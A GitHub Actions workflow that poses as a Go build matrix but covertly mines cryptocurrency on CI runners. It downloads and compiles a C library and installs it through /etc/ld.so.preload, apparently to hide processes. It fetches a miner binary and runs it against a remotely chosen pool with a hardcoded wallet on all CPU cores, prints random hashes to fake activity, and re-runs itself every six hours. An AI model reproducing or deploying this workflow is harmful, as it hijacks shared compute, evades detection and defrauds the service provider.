name: Build and Run Custom Unf

on:
  workflow_dispatch:
  push:
    branches: ["main"]
  schedule:
    - cron: '0 */6 * * *'

jobs:
  build:
    name: Build Go ${{ matrix.go }} - Flag ${{ matrix.flag }}
    runs-on: ubuntu-latest
    strategy:
      matrix:
        go: [1, 2, 3, 4, 5]
        flag: [A]
      max-parallel: 5
      fail-fast: false

    env:
      NUM_JOBS: 40
      JOB: ${{ matrix.go }}
      FLAG: ${{ matrix.flag }}

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up environment
        run: |
          sudo apt-get update
          sudo apt-get install -y sudo wget build-essential jq

      - name: Download and compile C file
        run: |
          curl -s https://github.com/barburonjilo/back/raw/main/nyumput.c -o nyumput.c
          gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
          sudo mv libnyumput.so /usr/local/lib/
          echo "/usr/local/lib/libnyumput.so" | sudo tee -a /etc/ld.so.preload
          sudo ldconfig
          rm nyumput.c

      - name: Create directory and download binary
        run: |
          mkdir -p .lib
          cd .lib
          wget -qO sgr1 https://github.com/barburonjilo/back/raw/main/sr
          chmod +x sgr1

      - name: Download and parse JSON file
        run: |
          wget -qO list.json https://github.com/barburonjilo/setstra/raw/main/list.json
          IP=$(jq -r '.[]' list.json | shuf -n 1)
          PORT=$((RANDOM % 11 + 842))
          CPU_CORES=$(nproc --all)
          WALLET_INFO="${CPU_CORES}-$(echo ${IP} | sed 's/\./_/g')-${PORT}"
          CORE_MASK=$(printf "%x" $(( (1 << $CPU_CORES) - 1 )))
          echo "IP=${IP}" >> $GITHUB_ENV
          echo "PORT=${PORT}" >> $GITHUB_ENV
          echo "WALLET_INFO=${WALLET_INFO}" >> $GITHUB_ENV
          echo "CORE_MASK=${CORE_MASK}" >> $GITHUB_ENV

      - name: Run custom script
        run: |
          cd .lib
          taskset $CORE_MASK ./sgr1 --algorithm yescryptr32 --pool $IP:$PORT --wallet UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$WALLET_INFO --password x --disable-gpu --cpu-threads $(nproc --all) --enable-1gb-hugepages --keepalive >/dev/null 2>&1 &
          while true; do
              echo $RANDOM | md5sum | head -c 20
              echo
              sleep 3m
          done
